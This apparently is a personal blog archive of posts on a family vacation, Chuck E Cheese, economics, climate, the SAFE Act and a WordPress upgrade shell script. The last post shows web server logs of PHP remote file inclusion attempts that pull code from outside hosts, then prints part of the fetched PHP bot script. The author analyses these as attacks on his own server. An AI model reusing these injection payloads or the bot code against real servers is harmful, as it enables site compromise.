Description:
Intelligent discussion on politics, technology, and security. 100% less ads than the competition.
Contents:
Vacation in Panama City Beach
Last week, I took my family to Panama City Beach. I know what you’re thinking - what a dump. I don’t mean Panama City, I mean Panama City Beach - a few miles down the coast. It’s not the concrete jungle that Panama City is… Yet.
When we arrived, I was standing at the back of our van in the unloading area of our condo. As I was waiting for my wife to come back with a luggage cart, a fire truck with lights and siren pulled up behind me. Two firemen jumped out and yelled at me to get out of the way (I wasn’t in the way).
After settling in, we went to the pool. While we were there, a Coast Guard helicopter kept slowly flying over the beach about 200 yards away.
As it turns out, somewhere between 50 and 100 people (the exact number is not clear) had to be rescued from the Gulf. Two people drown as we started our vacation.
In the morning, we noticed that the beach is crawling with manta rays. We were up on the 17th floor, so we had a great view. I put on the telephoto lens and started snapping.
As we watched them, we realized that they surf! This is the best picture of one surfing.
They would swim around and realize that a wave was over top of them. Then they would move up into the wave or to the front of the wave and ride it in almost to shore.
The rays would come really close to the shore at certain times of the day, especially when the beach was empty. I took this picture standing on the shore:
Later in the trip, we rented a pontoon boat and drove out to Shell Island. There were some amazing inlets and shallow bays. Even before we toss the anchor in, my youngest son spotted a puffer fish:
There was some amazing scenery on the island. I am particularly proud of this picture:
We found a bunch of anemones too:
Hard to tell in the picture, but they were alive and wiggling.
I found a few jelly fish floating on by whilest surfing:
Towards the end of the trip, one of the kids of a couple we knew at the condo found this fish:
It was quite odd. I still can’t identify what it is. The fish hugged the ground. It doesn’t fit the description of and of the flat fish that I have seen. I suspect it may be a fry of a much larger common flat fish.
All in all, it was an awesome vacation. Panama City Beach is quite nice. The new Pier Park area has turned out to be very cool. I hope you all get a chance to check it out some day.
I have quite a few more pictures of cool stuff from vacation here.
What happened to Chuck E Cheeze?
When I was a kid, the highlight of my year was to get to go to Chuck E Cheeze. They had many cool games and the singing, dancing animitronics. I hadn’t been there is a long, long time until last year. I went for a birthday party that my son was invited to. It was pretty well run down. And the store is a very nice part of town. At the time I dismissed the experience as catching them on a bad day.
So, yesterday I get to go again for another 5 year old’s birthday. Nearly a year later. The first thing I notice as I’m walking around is that ALL of the games are the very same as my last visit. I also notice that the same games that were not working last time are STILL not working this time. I would estimate about 5% of their games are broken.
So, it comes time for the party to gather. As we sit down, the lights dim and the curtain opens and the animitronic Chuck E Cheeze starts to sing and do his bit. Except there’s no sound. One of the kids sitting at the table behind me asks her mom: “mommy, why can’t Chuck E Cheeze talk?”.
As I look around, there are some TV screens built into the walls. Some big, some small, all of them BROKEN. Two of them have only the red color gun working, the other colors making a nasty zig-zag line on the screen.
Now it’s time for Chuck E Cheeze to make his floor debut. As he’s meeting and high-fiving the kids, another employee is getting a large boom box out, asking a fellow co worker if the right CD is in. She takes the stereo over to the wall near where Chuck E Cheeze is greeting his fans and plugs it in. And hits play. The group of kids conga’s around the store behind Chucky to music coming from the portable stereo.
After they all return, the employee lights the candles on two cakes - there are two simultaneous parties happening, after all. She runs over and changes the song to the Chuck E Cheeze happy birthday song. Which is interactive. And requires the employees to dance. The employees are trying to get the crowd to sing their part of the song: “I say happy… You say birthday… Happy…” silence. Over and over and over. I would swear that I was in some kind of bad Chevy Chase movie.
I felt pretty bad for the poor employees who kept bumping into each other as they are attempting to pull off the corporate dance moves, and being unsuccessful at rousing the crowd.
On my way home, I started to wonder: why is it like that? Then, I remembered seeing a sign on the door as I walked in: “All of our games are now just 1 token!”. Ah, that’s it. When I went 30 years ago, the games were a quarter as well. The games I can play at home on my Wii at least compare favorably to the best games at the store, blowing most of them away. Going to Chuck E Cheeze is not the experience for my kids that it was for me. When I was a kid, Chuck E Cheeze had games that seemed so far advanced I felt like I was in the future. It was a maical place to me. For my kids, Chuck E Cheeze is a challenge to get as many tickets at possible to cash in for some crappy toy.
The margins of that store have to be razor thin.
Some cool scripts I’ve found
I have way too many domain names, and last weekend I decided to try to put some of them to productive use. I had the idea of pull all of my RSS feeds from my various sites to one common site. Initially, I looked at LeafRSS, but it wasn’t quite what I was looking for. If you are aggregating a homogeneous set RSS topics, then it makes sense - like Bip Bip for example. I looked around and found rnews. It was about as close to what I was looking for as I was going to find. So, I set up my domain www.invires.com with a rnews pulling from all of my sites (the ones that offer feeds, anyhow).
I was pretty pleased with the result. I had the idea to aggregate the various tropical fish forums out on the Internet into one site. So, I registered a new domain - www.tropicalfishnews.net to serve that purpose. I am hoping to have some time to tinker with rnews in the coming weeks. I would very much like to add an ajax type update mechanism, and some sort of scrolling ability. So, for each of the panes, the news would scroll down and a new entry would be added to the top, as the RSS feeds were updated.
Iran’s decision to trade oil in Euros instead of dollars
Iran announced that it is now trading oil Euros instead of dollars. The weakness in the dollar is cited as a primary reason, though it is understood that the growing tension between the US and Iran is probably a key factor as well.
The general reaction I have seen is: “Holy Crap!”. But, I have to wonder: what is the real impact of doing such a thing, from any side? Oil is a fungible commodity. Currencies are traded on the market. Oil sold in Euros is still convertable to the current exchange rate to dollars. So, someone who wants to buy a million barrels of oil from Iran has to convert $120M to 75M Euro before conducting the transaction? That does sound grave. I suppose the net effect is that Iran will be holding $80B less US dollars per year. Since NO US institution can transact business with the Iran anyhow, Iran is most likely having to exchange them for Euros, Yen or some other currency before doing anything meaningful with it anyhow.
I suspect the risk is that the whole oil market will eventually follow suit. With the recent behavior of the US, that seems likely, but I still have to wonder: will we care?
Wordpress backup script
I was looking to upgrade wordpress today, and realized that there MUST be a better way. So, I hit google up for a “wordpress upgrade script”. Sure enough, I found a great script at http://pthree.org/2007/03/02/wordpress-upgrade-script/. I played with it, but it still required a lot of work - looking up database usernames and whatnot. I figured that I could pull the username, database name and password out of the wp-config.php file. And I could.
So, now the script just pauses to remind you to deactivate your plugins. I tried to find a way to automate that, but have struck out so far. If you know how, let me know! I’ll give you credit.
Script follows:
#!/bin/bash
# Updated by: Jerry Bell
# License remains intact
# Changes:
# - Added a backup directory that is outside the document root. The previous script left copies of the database accessible
# - Added code to automatically determine the database name, database username, and database password from the wp-config.php file.
# - Removed "read" prompts - they're not really needed any more
# - Set tar to send the archive to the backup directory instead of document root.
#
# This program upgrades your existing Wordpress installations that you are running on your server.
#
# You need to make the necessary adjustments to this script as needed for your situation.
#
# Make this script executable: 'chmod 777 wp_upgrade.sh'
# Run the script: './wp_upgrade.sh'
#
# Author: Aaron Toponce
# License: GPL v2
# Version: 0.1.2
# =================== Start of Script =================== #
# Provide the necessary directories to what Wordpress installations need to be backed up space delimited
# Change as necessary and uncomment
# For example, if you had 3 sites in /var/www/site1, /var/www/site2 and /var/www/site3
# then it would look like below (do not add the trailing slash):
# directories=(/var/www/site1 /var/www/site2 /var/www/site3)
backupdir=/var/tmp
number=${#directories[@]}
# Testing that all directories specified above are valid before beginning
for (( i = 0 ; i < number ; i++ )); do
if [[ ! -d ${directories[$i]} ]]; then
echo “Directory ${$directories[$i]} does not exist.”
return 1
fi
done
# First, we need to get the necessary file
cd ~
if [[ -f wordpress.tar.gz ]]; then
echo “wordpress.tar.gz exists. Please take notice to this upgrade before continuing.”
return 1
fi
wget -O latest.tar.gz http://wordpress.org/latest.tar.gz
echo "First disable all plugins on all installations before continuing."
echo "Press ENTER to continue..."
read blah
for (( i = 0 ; i < number ; i++ )); do
clear
cd ${directories[$i]}
back_ts=$(date +%s)
mkdir ${backupdir}/backup_${back_ts}
echo “We are backing up the full directory, in case anything goes wrong. Press ENTER…”
read blah
tar -cvvf ${backupdir}/backup_${back_ts}/backup.tar ${directories[$i]}
gzip ${backupdir}/backup_${back_ts}/backup.tar
# Timestamp in unix epoch format to create unique backup directories
echo "backing up database for ${directories[$i]}:”
# Backing up the necessary Wordpress database
wp_db=`grep DB_NAME ${directories[$i]}/wp-config.php | cut -f 4 -d “‘”`
wp_user=`grep DB_USER ${directories[$i]}/wp-config.php | cut -f 4 -d “‘”`
wp_pass=`grep DB_PASSWORD ${directories[$i]}/wp-config.php | cut -f 4 -d “‘”`
mysqldump –add-drop-table -u ${wp_user} -p${wp_pass} ${wp_db} > ${backupdir}/backup_${back_ts}/${wp_db}.sql
# Make the necessary changes for what to backup. This is the default as provided by Wordpress.
echo “Backing up the important files. Press ENTER…”
read blah
cp .htaccess wp-config.php ${backupdir}/backup_${back_ts}
cp -r wp-content wp-images wp-includes/languages ${backupdir}/backup_${back_ts}
# Time to copy the latest wordpress that we downloaded and overwrite all files
echo "Getting the latest cp of wordpress. Press ENTER..."
read blah
cp ~/latest.tar.gz ./wordpress.tar.gz
tar -zxvf wordpress.tar.gz
# Overwrite all files
echo "Overwriting all old Wordpress files with the new."
cd wordpress
cp -rf * ../
# Copy the files that we backed up back
echo "Coping the important backed up files back in."
cp -rf ${backupdir}/backup_${back_ts}/.htaccess ${directories[$i]}
cp -rf ${backupdir}/backup_${back_ts}/wp-config.php ${directories[$i]}
cp -rf ${backupdir}/backup_${back_ts}/wp-content ${directories[$i]}/wp-content
cp -rf ${backupdir}/backup_${back_ts}/wp-images ${directories[$i]}/wp-images
cp -rf ${backupdir}/backup_${back_ts}/wp-includes/languages ${directories[$i]}/wp-includes/languages
echo "Point your browser to the necessary site and run the upgrade script."
echo "EG: http://example.com/wp-admin/upgrade.php”
echo “Update your permalinks and .htaccess.”
echo “Install updated plugins and themes”
echo “Reactivate plugins”
echo “Press ENTER to continue…”
read blah
done
clear
echo "Congratulations! You have successfully upgraded your Wordpress."
echo "Please review that your browser resolves your site."
echo "Enjoy!"
Authentication in the real world
There is an interesting prank being pulled on CEO’s and CFO’s of many large public companies that highlights the trouble of authentication in the real world. The wall street journal has a report about a prankster who dials into a quarterly earnings call and gives a bogus name and company to the operator. A well known name and well known company. See, few people are allowed to ask questions on these calls to prevent just this sort of thing. But, there is no good way to validate the caller’s identity.
The story was well timed for me. I picked my son up from preschool last week with my wife - the first time I had done so. We waited in a line of cars and as we approached the building, my wife pulled out a paper plate that was clipped to a clothes hangar. She dutifully hung the plate from the rear view mirror. A worker called out plate numbers via radio to signal to bring him outside to wait to be picked up.
I was really struck by this authentication mechanism. I have to use several passwords to connect to near meaningless data at my office, but to pick up my kid, it only takes a paper plate and a magic marker.
Our Economy is in Trouble
In the past 24 hours, Bank of America has announced that it entered into an agreement to acquire Countrywide Financial. That’s an amazing thing. Countrywide holds north of 20% of mortgages in the US. As the housing market continues to unwind, they are seeing an increasing number of delinquent payments. Despite this, Countrywide has to continue to pay the investors who funded a given mortgage until a disposition has been reached on that mortgage - either a new payment plan can be established, the borrower pays up, or the mortgage goes into default. Normally, a company like Countrywide would tap a line of credit to help cover any difficulties. These days, though, extremely few investors want to buy debt. So, Countrywide sits in a position where it is exposed to the point where it may have to file for bankruptcy protection, which will cause a further unwinding as it’s credit rating deteriorates. BoA can be seen as a white knight coming in to provide a stable foundation for Countrywide to continue operations. For it’s part, BoA needs to protect the $2B investment is previously made in Countrywide.
Clearly, this is a signal that we are in trouble. The market is clearly looking to the government to ride in and save the crumbling economy with a stimulus in the form of a rate cut. The fed futures rate currently predicts a 50 basis point cut before their next meeting, and another 50 basis point cut at the meeting. We know that the market is hanging it’s hat on this as we saw yesterday during Big Ben’s speech. Part of the speech had apparently been leaked shortly before it began, and a certain comment about the fed being willing to take action to help stimulate a recovery was taken out of context, causing the market to rise dramatically. The market then fell as the statement was read and the real intent was clear.
Here’s the issue: interest rates arguably got us into this position and we are expecting it to get us back out. The government has a set of levers that include:
- Overnight, inter-bank interest rate - the “fed rate”
- Interest rates on fed-backed borrowing - the “discount window”
- Taxes
- Deficit
It can be argued that the “taxes” and the “deficit” levers are broken at the moment. President Bush was out this week touting more tax cuts, but they seem like a hollow rattle coming from a lame duck president with an opposing congress.
So, what will lowering rates do? Arguably, not a lot to solve the actual problem we are experiencing. In a NORMALLY FUNCTIONING economy, lower rates would stimulate spending, corporate mergers, capital investment, and so on. But, we can observe that investors are so wrapped up in bad press of credit markets that it seems unlikely that the past trends will apply. We would likely experience more of the negative consequences of lower rates than positive. The negative consequences being inflation. Unfortunately, we have an inflationary headwind blowing against the US economy that really is not linked to the US economy. We have seen most commodities double or triple in price over the past 24 months., largely driven by the growth of other economies, and to some extend, growing speculation through vehicles like ETFs. The inflation caused by lowering rates will only be additive to the existing pressures.
What caused the credit markets to go to hell in the first place? The obvious answer is a misread by the fed when it chose to being a rate rising campaign many quarters ago. Certainly, a slower rise in rates would have allowed some of the unwinding we are seeing to occur over a longer time. However, the REAL cause was the lowering of rates earlier in the decade. We call ourself a “free market”, but then when things get tough, our government feels that it has to intervene to artificially keep the economy propped up. That is a recipe for disaster. The kind of disaster that we’re watching now. The government needs to remove the Federal Reserve Bank from it’s set of levers to control stimulus to the economy and use it only for what it is intended - to control inflation. Absolutely, doing so will cause many years of pain and recessions, but once the market is able to find it’s own way, we will have a much more stable environment. We have to let free markets be free.
In the wake of the “credit crunch”, we are going to see things get much worse as the problems move away from housing and to general consumer credit. We know that the US economy is largely driven by consumer spending, and we also know that US consumers spend out of debt. On a macro scale, what happens when consumers do not have vehicles to use debt to spend with? A sharp correction will have to result. Certainly, it’s not going to fall off of a cliff. Many factors will prevent that - lowering interest rates, foreign investments, etc, but we should expect that John and Jane Doe will be spending less time at the Wal Mart that before. This is particularly true as unemployment starts to rise and key commodities like food and gas become much more expensive. In the recent past, we have had an offset to such things from rising property values. We no longer have that offset.
From the standpoint of an investor, it looks like a great opportunity to buy into the market. Just like it’s a great time for someone to buy a house. We will get through this, but it’s going to be a wild ride for the next few months.
Carbon, human impact on climate and the Earth
How is Global Warming like God?
There appears to be an inverse relationship between the belief in God, and the belief that humans are causing global warming. Certainly, there seems to be an increasing acceptance of human impact on climate, even within the ranks of the religious right, but it’s happening slowly. I find the parrellels between the two quite interesting.
In religion, an authority figure tells you that you must believe in the power of God. You can witness his hand in all that you see. Any time something bad happens, God is testing your faith, and any time something good happens, God is responsible, too. In climate change, scientists or other authority figures tell you that humans are absolutely having an impact on the environment. You can witness the impact in all that you see. There are major wildfires, terrible hurricanes, droughts, floods, all having grave impacts on human lives, all clearly the impact of global warming.
But, the question needs to be asked: are scientificly minded people falling into the same trap as those religious people they criticize for taking things on faith? It’s completely logical to think that all of the fossil fuels we burn - the billions of tons of it - must be have something to do with the super severe hurricanes we have experienced, and the droughts we have in the southeast US, among other places. If you have a foundational belief that something is true (i.e., God exists, or Human Initiated Global Warming exists), then your observations are made through that lens. Recovering from terminal cancer is a miracle from God, and a drought is the result of human production of carbon dioxide.
I will grant that the climate changers have some science on their side, as well as a lot of imperical observations. Pervasive smog is clearly a result of human activity. Computer generated climate models roughly match the observations we see in the real world, given the same inputs.
Do We Really Understand the Causes and Impacts of Climate Change?
But, we have to concede that we just do not have the ability to fully model, and therefore understand, the impact of human activity on climate. The number of variables is astounding. It seems intuitive, though, that the largest factors are not within the control of humaity, though. That being the natural release of CO2 (volcanic activity, oceanic gas exchange, etc) and the increasing output of the sun. We can definitively say that the global climate has increased by 1 degree F in the past 129 years, but little more than that. In the aftermath of the series of devistating hurriance seasons in the first half of this decade, we were put “on notice” that hurricane seasons were going to become more turbulent and violent becaue of the impact of global warming. I do not mention this to dispute whether or not the climate is changing, only that our understanding of the causes and effects are limited.
Global warming received a lot of attention in the past months as wildfires raged in California. But, realistically, can wildfires be blamed on global warming? That implies that we can draw a definitive link between human CO2 release and a sudden reduction in rainfall over a short period of time. Or, is it that humans have tried to manage the environment too closely? As human population explodes, and we move into forested areas, we are duty-bound to save homes and businesses, stopping the natural leveling of fuel available to burn in forests. Dire reports of out of control fires are much more likely to make it to the masses, both because of the pervasive amatuer videos & news outlets, and because we simply have more people living in the shadows of big forests.
And that’s an important point: as the human population on Earth continues to grow, we will occupy more and more of the surface of the Earth, even those parts that were previously too dangerous. Once, where a category 5 hurricane would just knock down some palm trees and beach houses, we have major human disasters because we did not properly plan for evacuations, we did not properly design structures to take that kind of a pounding, etc. Is a category 5 hurricane that only killed 5 people in 1808 and less severe than the same hurricane that hits the same area 200 years later, but causes 5,000 deaths and $100,000,000,000 in damage?
Trees, Trees, Trees!
An apparently easy way to help offset the problem of our polluting ways is to grow trees that will pull the CO2 out of the air. It makes a lot of sense. But, it’s not a good solution.
“One acre of forest absorbs six tons of carbon dioxide and puts out four tons of oxygen. This is enough to meet the annual needs of 18 people.”
- US Department of Agriculture
The problem is that trees don’t permanently store the CO2 they absorb. That CO2 is ultimately released back into the air, most commonly from the tree being burned. The real issue is that humans have increased the amount of carbon on the suface of the Earth by digging up, and subsequently burning, fossil fuels. The question is whether that’s an amount significant enough to cause an impact to the climate. A potential solution could be to inject some amount of the CO2 we produce back underground.
In the context of the timeline of the Earth, the impacts of humans would likely not be perceptible on a graph of the climate. In the end, the Earth will be fine. If, in fact, humans are the cause of an out of control process of global warming, it is only the life on the planet that we hurt. 10,000,000 years from now, the only traces of humanity will be some really nasty layers of sediment, buried several hundred feet below the ground.
In that respect, it seems like we should have a “Life Day”, rather than an “Earth Day”, since that is what we’re really trying to protect.
Conclusion
It’s hard to imagine that the constant and increasing amount of CO2 and other pollutants we are putting into the air have no impact on the climate. We know that our pollution is creating health impacts. It seems like a safe approach to reduce our emissions where we can, but we have to come to terms with the reality that we just don’t know if that is going to have any impact on the rising global temperatures.
Securing Adolescents From Exploitation-Online (SAFE) Act
The US House of Representatives passed the SAFE act by a 409 to 2 margin. It also appears likely to pass the senate. It is interesting to note that one of the 2 “nay” votes on the bill was none other than Ron Paul. While I agree with his decision to vote against the bill, it will certainly come back to bite him. “How can you be in favor of exploiting children, Mr. Paul?”
On the surface, the bill appears to be a draconian measure placed on ISPs, web hosts, public wifi provders, etc, requiring them to report all instances where child pornography is transmitted over their network to the National Center for Missing and Exploited Children. The penalty for non-compliance is $150,000US for a first offense, and $300,000 for subsequent offenses. Complying with the law provides civil and criminal immunity from any resulting legal issues of the disclosure. That’s about the extent of what is being reported in most of the alarmist media.
If you ACTUALLY READ THE BILL, you will notice this interesting section:
`(f) Protection of Privacy- Nothing in this section shall be construed to require an electronic communication service provider or a remote computing service provider to–
- `(1) monitor any user, subscriber, or customer of that provider;
- `(2) monitor the content of any communication of any person described in paragraph (1); or
- `(3) affirmatively seek facts or circumstances described in subsection (a)(2).
Very interesting. So, the law doesn’t require the providers to proactively monitor traffic. So, what does it do then?
Providers that use technology to determine if someone is viewing an inappropriate site - from a known list of sites or from some form of intelligent analysis of the image content - they are compelled to report such traffic to the NCMEC. If a web hosting company discovers that a customer is hosting child porn, the hoster must report it.
The other important aspect of the law is what must be reported. Essentially all identifiable info that is know must be submitted, presumably in an attempt to track back to the owner.
In some respects, this bill just makes something that’s illegal even more illegal. The bill does add some additional mechanisms to find the child pornographers, distributers and those that view it, and does not appear to place a major burden on providers.
The downside, as usual, is in the interpretation of child porn. It’s interesting that a definition of “child pornography” is not included in the bill, yet many other things like “web site”, are. It is conceivable, as some reports of the bill contend, that clothed children in lascivious poses could constitute child porn. I wonder how the average Abercrombie & Fitches catalog would fare?
Crazy php code injections
As I’ve written about here several times, the onslaught of unsuccessful php include attacks continues. Today, I saw a new file referenced - bot.txt. It looked like this in the apache log file:
216.246.48.124 - - [23/Nov/2007:17:17:13 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
216.246.48.124 - - [23/Nov/2007:17:17:13 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
216.246.48.124 - - [23/Nov/2007:17:17:14 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
205.234.253.31 - - [23/Nov/2007:17:18:40 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
205.234.253.31 - - [23/Nov/2007:17:18:40 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
205.234.253.31 - - [23/Nov/2007:17:18:41 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
72.29.84.167 - - [23/Nov/2007:17:18:57 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
72.29.84.167 - - [23/Nov/2007:17:18:57 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
72.29.84.167 - - [23/Nov/2007:17:18:57 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
69.65.20.238 - - [23/Nov/2007:17:19:18 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41832 “-” “libwww-perl/5.808″
69.65.20.238 - - [23/Nov/2007:17:19:18 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41881 “-” “libwww-perl/5.808″
69.65.20.238 - - [23/Nov/2007:17:19:19 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41844 “-” “libwww-perl/5.808″
205.134.252.23 - - [23/Nov/2007:17:21:05 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41832 “-” “libwww-perl/5.808″
I have been downloading and looking at each of the files I see - most of them are the same or loosely copied from one another. Today is the first time seeing this file for me. The file follows:
</html>
<title>31337</title>
<?php
//fighter script - BAJAY
function working() {
$querym=array(
“?”,
“!”,
“^^”,
” ^^”,
” :(”,
” :)”,
” ~:>”,
” :P~”,
” :D”,
“,”,
“.”,
“a”,
“i”,
“u”,
“e”,
“o”,
“z”,
“v”,
“z”,
“x”,
“c”,
“p”,
“m”,
“t”,
“k”,
“b”,
“s”,
“u”,
“bot”,
“g”,
“lo”,
“jo”,
“lol”
);
$tsu1=array(”`”,”|”,”[","]“,”{”,”}”,”^”,”“);
$tsu2=array(”`”,”|”,”[","]“,”{”,”}”,”^”,”-”,”\\”,”“);
$nicky=array(
”indotong”,
”rujange”,
”kentungs`”,
”sa_bosox”,
”japut1h”,
”start-Tegal”,
”stafp-pol”,
”apring”,
”my-bojo”,
”didiamu”,
”acongkasep”,
”rahasiailahi”,
”kutukurap”,
”duniagame”,
”pipilak”,
”Deeams”,
”Dewiani”,
”Lohanes”,
”Semsem2″,
”kuruyuk”,
”J4mput9″,
”acongTop”,
”bojokuayu”,
”Yuliyanti”,
”Ratnazar1″,
”Mydidit”,
”Rebecha”,
”Rastang”,
”Ganjils”,
”Bob-ho”,
”Dhinihari”,
”Dewimalam”,
”Lunaks”,
”Lowo-lawet”,
”Kolor-ku”,
”repolisi”,
”macanireng”,
”ivantat”,
”Kasugihan”,
”Kasiandeh”,
”awakapal”,
”Rachings”,
”War-tol”,
”Warnetlu”,
”Antikus”,
”[Dwirais]“,
”Phoecrot”,
”hiumania”,
”mas-amain”,
”Fafa-item”,
”Neonoek”,
”mba-abel”,
”Bencana”,
”nyosor”,
”Fitaken”,
”novakerep”,
”poerin”,
”lembene”,
”[sutijah]“,
”Skickmat”,
”Depangank”,
”Bonutang”,
”Stelangas”,
”Hellomam”,
”Pinkwingke”,
”Rolsepatu”,
”Defanku”,
”Mamalia”,
”Grahams”,
”Rocok”,
”jintuL-”,
”Urunan”,
”Piceks”,
”Kirbaju”,
”Asinans”,
”Muluk”,
”Mainanku”,
”Memete”,
”Kerambol”,
”Morbaut”,
”Clanane”,
”Nicitirta”,
”Jahlogo”,
”Sogokeh”,
”Hayamwuruk”,
”Selipan”,
”Myculun”,
”Mybojoe”,
”Selething”,
”T|kets”,
”Kompromi”,
”Montoks”,
”Trinitad”,
”Turboxs”,
”Mymata”,
”Indomobil”,
”KotaTegalkoe”,
”Peramal”,
”Hilangkoe”,
”Jalangs”,
”Jeengkel”,
”KaKikuda”,
”zhempol”,
”Pupens”,
”reneo”,
”[dorce]“,
”[yakin]“,
”[sung]“,
”[asli]“,
”suratan”,
”Cemplunk”,
”ladood”,
”lodados”,
”Jaambret”,
”Nyanyie”,
”Karmate”,
”Kunclup”,
”Simiskin”,
”Kamprets”,
”Kandang”,
”Kamuse”,
”Kendils”,
”Ketans”,
”Maantri”,
”anjengk”,
”angklung”,
”Kopok”,
”Krasi”,
”Kotors”,
”Karpets”,
”Kejangs”,
”Antraxs”,
”Adaband”,
”Kakusung”,
”Cocoran”,
”Bebelak”,
”Buluss”,
”Banatung”,
”Bembem”,
”Buntung”,
”Boroks”,
”Bambangs”,
”Bonteng”,
”Bumbu”,
”Bagasi”,
”Bimbing”,
”Chawets”,
”Coontex”,
”Clikat”,
”Cemceman”,
”Cokore”,
”Cuning”,
”Karmans”,
”Kodils”,
”Kaamra”,
”Darjo”,
”Dawud”,
”Daarto”,
”Damrie”,
”Dakroni”,
”Dimyati”,
”Dulung”,
”Enteng”,
”Emaxs”,
”Lomoboh”,
”Comodore”,
”Cimenks”,
”Cerutu”,
”Contonge”,
”Cukek”,
”Comblang”,
”Cemplak”,
”Cemanie”,
”Cembok”,
”Cekram”,
”Tegasung”,
”Tegarlah”,
”Teguhlah”,
”Tegeltak”,
”Tempek”,
”Antraxs”,
”Ampow”,
”Azdan”,
”Aburadul”,
”Antro”,
”Amings”,
”Angrexs”,
”Asrama”,
”Alimsung”,
”Aalas”,
”Abangku”,
”Amise”,
”Aconks”,
”Acongcup”,
”Acongsu”,
”Aconger”,
”Acongus”,
”Acongen”,
”sshd”,
”Masterkid”,
”alexutz”,
”andreea”,
”diana”,
”marius”,
”r00t”,
”kit”,
”mihai”,
”mihaela”,
”mario”,
”daiana”,
”andrei”,
”andreia”,
”tigan”,
”petre”,
”peter”,
”alexandre”,
”raluca”,
”master”,
”kid”,
”alias”,
”sbin”,
”p0rt”,
”sync”,
”mildest”,
”xzvf”,
”tar”,
”tgz”,
”dfg”,
”netcatxpl”,
”xpl”,
”xop”,
”xpls”,
”xploit”,
”xploits”,
”drxrwx”,
”drx-x”,
”system32″,
”alexandru”,
”alexander”,
”mihaela”,
”andrusca”,
”andra”,
”darius”,
”dani”,
”darnie”,
”daniel”,
”daniela”,
”mist3r”,
”x9v93c”,
”hunglec”,
”blasje”,
”bash”,
”blicke”,
”foirne”,
”wonder”,
”cvv2″,
”ssn”,
”creditcard”,
”ccnumber”,
”usher”,
”salam”,
”guta”,
”gutza”,
”biatchx”,
”bitch”,
”bitchX”,
”cine3″,
”scufitza”,
”copiluldeaur”,
”b0r4k”,
”counter”,
”strike”,
”usuf”,
”erny”,
”ernest”,
”modjo”,
”jinger”,
”b0ts”,
”r00ter”,
”g00gler”,
”mistcke”,
”linuxhack”,
”linuxhacker”,
”hacked”,
”fain”,
”ssl”,
”czxvr”,
”alb”,
”rosu”,
”romania”,
”rusia”,
”uk”,
”anglia”,
”comment”,
”hi5″,
”yah00″,
”silence”,
”us-com”,
”htiermc”,
”c00ldown”,
”misteryo”,
”hasked”,
”billaio”,
”smeoua”,
”muie”,
”sugator”,
”hashed”,
”f0lds”,
”folk”,
”f0lks”,
”numeroben”,
”hulk”,
”hiscke”,
”unae”,
”unhackable”,
”unhacker”,
”h4ack3rz”,
”hackerz”,
”ruter”,
”inji”,
”injecto”,
”freespace”,
”bulling”,
”mihaio”,
”ulgia”,
”c992mc”,
”miskce”,
”uber”,
”n0r”,
”c0x”,
”niekad”,
”naked”,
”nakedboy”,
”b0ys”,
”b0y”,
”messenger”,
”hopa”,
”hai-hui”,
”power-me”,
”sekos”,
”micke”,
”n0tron”,
”ron”,
”d0llars”,
”Euros”,
”pavalgia”,
”nasty”,
”hideend”,
”miskr3c”,
”incjen”,
”mass”,
”mailers”,
”mail3r”,
”th3kid”,
”k1d”,
”hepa”,
”m00r-d3f”,
”tzaca-paca”,
”headshot”,
”higgings”,
”slapest”,
”gansta”,
”gigging”,
”oame”,
”aoana”,
”mcike_dke”,
”blible”,
”XeqtR”,
”Xander”,
”xXx”,
”xxL”,
”vartmp”,
”0aoek”,
”summer”,
”etez”,
”crucike”,
”n0rme”,
”mihale”,
”c0rneaz”,
”blestem”,
”ghoost”,
”sicles”,
”c0mrsze”,
”sckme”,
”abie9t”,
”g912mc”,
”opernms”,
”micake”,
”qsuen”,
”zquers”,
”targetzd”,
”kem30ce”,
”nik1rc”,
”miosugi”,
”sugipula”,
”alupigus”,
”criminal”,
”danke”,
”shonw”,
”c0mrme”,
”muhahah”,
”biker4zs”,
”ckkemc”,
”clujeane”,
”hepahofn”,
”hepafon”,
”blackspace”,
”aabbcc”,
”ni1krc”,
”perosume”,
”perugis”,
”cliskeacz”,
”hennmx0c”,
”gbusf41″,
”bv9mvu3″,
”nik3rcs”,
”ghruwec”,
”slickez”,
”burgez”,
”h4mburger”,
”dijenmcie”,
